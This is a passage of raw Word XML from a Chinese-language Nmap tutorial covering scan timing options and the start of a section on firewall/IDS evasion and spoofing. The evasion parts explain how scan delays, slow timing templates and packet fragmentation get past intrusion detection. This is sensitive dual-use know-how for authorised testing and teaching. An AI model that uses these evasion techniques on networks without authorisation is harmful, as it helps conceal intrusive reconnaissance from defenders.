        <w:t>Nmap具有并行扫描多主机端口或版本的能力，Nmap将多个目标IP地址空间分成组，然后在同一时间对一个组进行扫描。通常大的组更有效。缺点是只有当整个组扫描结束后才会提供主机的扫描结果。如果组的大小定义为50，则只有当前50个主机扫描结束后才能得到报告。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>默认方式下，Nmap采取折衷的方法。开始扫描时的组较小，最小为5，这样便于尽快产生结果；随后增长组的大小，最大为1024。确切的大小依赖于所给定的选项。为保证效率，针对UDP或少量端口的TCP扫描，Nmap 使用大的组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>--max-hostgroup选项用于说明使用最大的组，Nmap不会超出这个大小。--min-hostgroup选项说明最小的组，Nmap会保持组大于这个值。如果在指定的接口上没有足够的目标主机来满足所 指定的最小值，Nmap可能会采用比所指定的值小的组。这两个参数虽然很少使用， 但都用于保持组的大小在一个指定的范围之内。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>这些选项的主要用途是说明一个最小组的大小，使得整个扫描更加快速。通常选择256来扫描C类网段。对于端口数较多的扫描，超出该值没有意义。对于端口数较少的扫描，2048或更大的组大小是有帮助的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>举例</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.180.187.0/24网段进行tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> syn扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中：最大并行探测主机数量为256；最小并行探测主机数量为5。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BF1584" wp14:editId="54A90A38">
            <wp:extent cx="5274310" cy="35064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506470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:object w:dxaOrig="1544" w:dyaOrig="1122">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:77.25pt;height:56.25pt" o:ole="">
            <v:imagedata r:id="rId286" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1573626550" r:id="rId287"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="84" w:name="_Toc496014450"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> min-parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>max-parallelism</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些选项控制用于主机组的探测报文数量，可用于端口扫描和主机发现。默认状态下， Nmap基于网络性能计算一个理想的并行度，这个值经常改变。如果报文被丢弃，Nmap降低速度，探测报文数量减少。随着网络性能的改善，理想的探测报文数量会缓慢增加。这些选项确定这个变量的大小范围。默认状态下，当网络不可靠时，理想的并行度值可能为1，在好的条件下，可能会增长至几百。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最常见的应用是--min-parallelism值大于1，以加快性能不佳的主机或网络的扫描。这个选项具有风险，如果过高则影响准确度，同时也会降低Nmap基于网络条件动态控制并行度的能力。这个值设为10较为合适，这个值的调整往往作为最后的手段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--max-parallelism选项通常设为1，以防止Nmap在同一时间向主机发送多个探测报文，和选择--scan-delay同时使用非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F9F90E" wp14:editId="57D491CF">
            <wp:extent cx="5274310" cy="358457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584575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:object w:dxaOrig="1544" w:dyaOrig="1122">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:77.25pt;height:56.25pt" o:ole="">
            <v:imagedata r:id="rId289" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1573626551" r:id="rId290"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="85" w:name="_Toc496014451"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> min-rtt-timeout/max-rtt-timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>initial-rtt-timeout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap使用一个运行超时值来确定等待探测报文响应的时间，随后会放弃或重新发送探测报文。Nmap基于上一个探测报文的响应时间来计算超时值，如果网络延迟比较显著和不定，这个超时值会增加几秒。初始值的比较保守(高)，而当Nmap扫描无响应的主机时，这个保守值会保持一段时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--min-rtt-timeout：最小探测超时，最少花费给定时间来等待探测回复和重传探测，这个选项很少使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>--m</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>-rtt-timeout：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大探测超时，最多花费给定时间来等待探测回复和重传探测。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：如果使用太小的值，使得很多探测报文超时从而重新发送，而此时可能响应消息正在发送，这使得整个扫描的时间会增加。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>initial-rtt-timeout：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化探测超时，用给定时间作为往返初始预计时间，如果用户了解需要扫描的网络，可以加速扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果所有的主机都在本地网络，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>--max-rtt-timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值来说，100毫秒比较合适。如果存在路由，首先使用ICMP ping工具ping主机，或使用其它报文工具如hpings，可以更好地穿透防火墙。查看大约10个包的最大往返时间，然后将 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>--initial-rtt-timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设成这个时间的2倍，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>--max-rtt-timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可设成这个时间值的3倍或4倍。通常，不管ping的时间是多少，最大的rtt值不得小于100ms，不能超过1000ms。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10EA98A1" wp14:editId="12EE1795">
            <wp:extent cx="5274310" cy="35731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573145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="86" w:name="_Toc496014452"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>host-timeout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于性能较差或不可靠的网络硬件或软件、带宽限制、严格的防火墙等原因， 一些主机需要很长的时间扫描。这些极少数的主机扫描往往占据了大部分的扫描时间。因此，最好的办法是减少时间消耗并且忽略这些主机，使用 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>--host-timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项来说明等待的时间(毫秒)。通常使用1800000 来保证Nmap不会在单个主机上使用超过半小时的时间。需要注意的是，Nmap在这半小时中可以同时扫描其它主机，因此并不是完全放弃扫描。超时的主机被忽略，因此也没有针对该主机的端口表、操作系统检测或版本检测结果的输出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530B605B" wp14:editId="767C69DB">
            <wp:extent cx="5274310" cy="35547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554730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="87" w:name="_Toc496014453"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> scan-delay/max-scan-delay</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个选项用于Nmap控制针对一个主机发送探测报文的等待时间(毫秒)，在带宽控制的情况下这个选项非常有效。Solaris主机在响应UDP扫描探测报文报文时，每秒只发送一个ICMP消息，因此Nmap发送的很多数探测报文是浪费的。--scan-</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>delay 设为1000，使Nmap低速运行。Nmap尝试检测带宽控制并相应地调整扫描的延迟，但并不影响明确说明何种速度工作最佳。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--scan-delay的另一个用途是躲闭基于阈值的入侵检测和预防系统(IDS/IPS)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF5FEDB" wp14:editId="013EDAA0">
            <wp:extent cx="5274310" cy="35877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587750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="88" w:name="_Toc496014454"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>-T &lt;Paranoid|Sneaky|Polite|Normal|Aggressive|Insane&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述优化时间控制选项的功能很强大也很有效，但有些用户会被迷惑。此外，往往选择合适参数的时间超过了所需优化的扫描时间。因此，Nmap提供了一些简单的方法，使用6个时间模板，使用时采用-T选项及数字(0 - 5) 或名称。模板名称有paranoid (0)、sneaky (1)、polite (2)、normal(3)、aggressive (4)和insane (5)。前两种模式用于IDS躲避，Polite模式降低了扫描 速度以使用更少的带宽和目标主机资源。默认模式为Normal，因此-T3实际上是未做任何优化。Aggressive模式假设用户具有合适及可靠的网络从而加速扫描。Insane模式假设用户具有特别快的网络或者愿意为获得速度而牺牲准确性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户可以根据自己的需要选择不同的模板，由Nmap负责选择实际的时间值。模板也会针对其它的优化控制选项进行速度微调。例如，-T4 针对TCP端口禁止动态扫描延迟超过10ms，-T5对应的值为5ms。模板可以和优化调整控制选项组合使用，但模板必须首先指定，否则模板的标准值 会覆盖用户指定的值。建议在扫描可靠的网络时使用 -T4，即使 在自己要增加优化控制选项时也使用(在命令行的开始)，从而从这些额外的较小的优化中获益。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果用于有足够的带宽或以太网连接，仍然建议使用-T4选项。有些用户喜欢-T5选项，但这个过于强烈。有时用户考虑到避免使主机崩溃或者希望更礼貌一些会采用-T2选项。他们并没意识到-T Polite选项是如何的慢，这种模式的扫描比默认方式实际上要多花10倍的时间。默认时间 选项(-T3)很少有主机崩溃和带宽问题，比较适合于谨慎的用户。不进行版本检测比进行时间调整能更有效地解决这些问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然-T0和-T1选项可能有助于避免IDS告警，但在进行上千个主机或端口扫描时，会显著增加时间。对于这种长时间的扫描，宁可设定确切的时间值，而不要去依赖封装的-T0和-T1选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T0选项的主要影响是对于连续扫描，在一个时间只能扫描一个端口，每个探测报文的发送间隔为5分钟。T1和T2选项比较类似， 探测报文间隔分别为15秒和0.4秒。T3是Nmap的默认选项，包含了并行扫描。 T4选项与 --max-rtt-</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>timeout 1250 --initial-rtt-timeout 500 等价，最大TCP扫描延迟为10ms。T5等价于 --max-rtt-timeout 300 --min-rtt-timeout 50 --initial-rtt-timeout 250 --host-timeout 900000，最大TCP扫描延迟为5ms。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6355CF0A" wp14:editId="6DF4A532">
            <wp:extent cx="5274310" cy="360870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608705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00872BF4" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc496014455"/>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>．防火墙/IDS躲避和哄骗</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap不提供检测和破坏防火墙及IDS系统的方法 (或Nmap选项)，它使用的是技术和经验，下面描述了相关的选项和完成的工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="90" w:name="_Toc496014456"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文分段及使用指定的MTU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-f选项要求扫描时(包挺ping扫描)使用小的IP包分段。其思路是将TCP头分段在几个包中，使得包过滤器、IDS以及其它工具的检测更加困难。必须小心使用这个选项，有些系统在处理这些小包时存在问题，例如旧的网络嗅探器Sniffit在接收到第一个分段时会立刻出现分段错误。该选项使用一次，Nmap在IP 头后将包分成8个字节或更小。因此，一个20字节的TCP头会被分成3个包，其中2个包分别有TCP头的8个字节，另1个包有TCP头的剩下4个字节。当然，每个包都有一个IP头。再次使用-f可使用16字节的分段(减少分段数量)。使用--mtu选项可以自定义偏移的大小，使用时不需要-f，偏移量必须是8的倍数。包过滤器和防火墙对所有的IP分段排队，如Linux核心中的CONFIG-IP-ALWAYS-DEFRAG配置项，分段包不会直接使用。一些网络无法 承受这样所带来的性能冲击，会将这个配置禁止。其它禁止的原因有分段 包会通过不同的路由进入网络。一些源系统在内核中对发送的报文进行 分段，使用iptables连接跟踪模块的Linux就是一个例子。当使用类似Ethereal的嗅探器时，扫描必须保证发送的报文要分段。如果主机操作系统会产生问题，尝试使用--send-eth选项以避开IP层而直接 发送原始的以太网帧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:bookmarkStart w:id="91" w:name="_Toc496014457"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用诱饵隐蔽扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
